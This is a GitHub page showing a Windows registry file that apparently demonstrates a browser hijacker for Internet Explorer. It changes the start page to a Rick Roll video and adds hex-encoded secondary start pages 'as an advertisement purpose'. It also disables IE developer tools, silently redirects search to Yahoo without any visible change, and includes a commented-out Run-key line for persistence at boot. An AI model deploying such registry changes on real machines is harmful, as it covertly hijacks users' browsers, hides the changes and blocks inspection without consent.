-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathieconf.reg
37 lines (33 loc) · 4.41 KB
/
ieconf.reg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Windows Registry Editor Version 5.00
; Change homepage to Rick Roll video
; and set value of default urls.
; In addition, add secondary start pages as an advertisement purpose.
; In this case, the secondary start pages are set to two funny gifs without any sensitive content
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.youtube.com/watch?v=dQw4w9WgXcQ"
"Search Page"="https://search.yahoo.com"
"Default_Page_URL"="https://icesonata.github.io"
"Default_Search_URL"="https://search.yahoo.com"
"Start Page Redirect Cache"="https://www.youtube.com/watch?v=dQw4w9WgXcQ"
"Secondary Start Pages"=hex(7):68,00,74,00,74,00,70,00,73,00,3a,00,2f,00,2f,00,\
6d,00,65,00,64,00,69,00,61,00,2e,00,67,00,69,00,70,00,68,00,79,00,2e,00,63,\
00,6f,00,6d,00,2f,00,6d,00,65,00,64,00,69,00,61,00,2f,00,50,00,67,00,4a,00,\
77,00,4d,00,4c,00,61,00,68,00,72,00,47,00,63,00,33,00,49,00,63,00,74,00,65,\
00,4f,00,74,00,2f,00,67,00,69,00,70,00,68,00,79,00,2e,00,67,00,69,00,66,00,\
00,00,68,00,74,00,74,00,70,00,73,00,3a,00,2f,00,2f,00,6d,00,65,00,64,00,69,\
00,61,00,2e,00,67,00,69,00,70,00,68,00,79,00,2e,00,63,00,6f,00,6d,00,2f,00,\
6d,00,65,00,64,00,69,00,61,00,2f,00,6c,00,34,00,4a,00,7a,00,33,00,61,00,38,\
00,6a,00,4f,00,39,00,32,00,63,00,72,00,55,00,6c,00,57,00,4d,00,2f,00,67,00,\
69,00,70,00,68,00,79,00,2e,00,67,00,69,00,66,00,00,00,00,00
; Disable IEDevTools
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\IEDevTools]
"Disabled"=dword:00000001
; Change default search engine to Yahoo, despite not displaying any change on the search bar of the browser
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SortIndex"=dword:00000001
"URL"="http://search.yahoo.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"
"NTURL"="http://search.yahoo.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"
"NTTopResultURL"="http://search.yahoo.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR"
; Add to RUN registry key, changing the registry key each time the computer is booted
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
; "SystemSearch"="cmd /C reg import %tmp%\\ieconf.reg"